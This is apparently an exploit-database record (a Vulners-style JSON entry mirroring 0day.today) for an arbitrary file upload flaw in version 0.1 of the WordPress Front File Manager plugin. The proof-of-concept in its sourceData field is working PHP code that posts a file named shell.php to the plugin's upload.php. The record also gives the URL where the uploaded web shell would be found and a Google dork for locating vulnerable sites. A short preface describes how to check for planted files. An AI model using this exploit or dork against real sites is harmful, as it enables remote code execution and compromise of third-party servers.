Description
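Exploit for the PHP platform, in the web applications category: an arbitrary file upload in the WordPress Front File Manager plugin 0.1. Per the proof of concept in the record below, upload.php accepts a posted file under a caller-chosen name and stores it under wp-content/plugins/uploads/[YYYY]/[MM]/, so unexpected .php files in that tree are what to check for on sites running the plugin.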
{"id": "1337DAY-ID-18525", "type": "zdt", "bulletinFamily": "exploit", "title": "Wordpress Front File Manager Plugin 0.1 Arbitrary File Upload", "description": "Exploit for php platform in category web applications", "published": "2012-06-08T00:00:00", "modified": "2012-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/18525", "reporter": "Adrien Thierry", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-16T05:10:02", "viewCount": 15, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/18525", "sourceData": "# Exploit Title: Wordpress front file manager 0.1 Arbitrary File Upload\r\n# Google Dork: inurl:wp-content/plugins/front-file-manager/\r\n# Exploit Author: Adrien Thierry\r\n# adrien dot thierryfr at gmail dot com\r\n# Vendor Homepage: http://www.webikon.sk/en\r\n# Software Link: http://downloads.wordpress.org/plugin/front-file-manager.zip\r\n# Version: 0.1\r\n \r\nPage upload.php is vulnerable to Remote File Upload. Code :\r\n \r\n<?php\r\n$u=\"whatyouwant.php\";\r\n$c = curl_init(\"http://site.com/wp-content/plugins/front-file-manager/upload.php\");\r\ncurl_setopt($c, CURLOPT_POST, true);\r\ncurl_setopt($c, CURLOPT_POSTFIELDS,\r\narray('file'=>\"@$u\",\r\n'name'=>\"shell.php\"));\r\ncurl_setopt($c, CURLOPT_RETURNTRANSFER, 1);\r\n$e = curl_exec($c);\r\ncurl_close($c);\r\necho $e;\r\n?>\r\n \r\n \r\n \r\nShell could be found at :\r\n http://site.com/wp-content/plugins/uploads/2012/06/shell.php\r\n (http://site.com/wp-content/plugins/uploads/[YYYY]/[MM]/shell.php\r\n \r\n#########################################################################################\r\n\r\n\n\n# 0day.today [2018-02-16] #", "_state": {"dependencies": 1645376749, "score": 1659766679, "epss": 1678812679}}
{}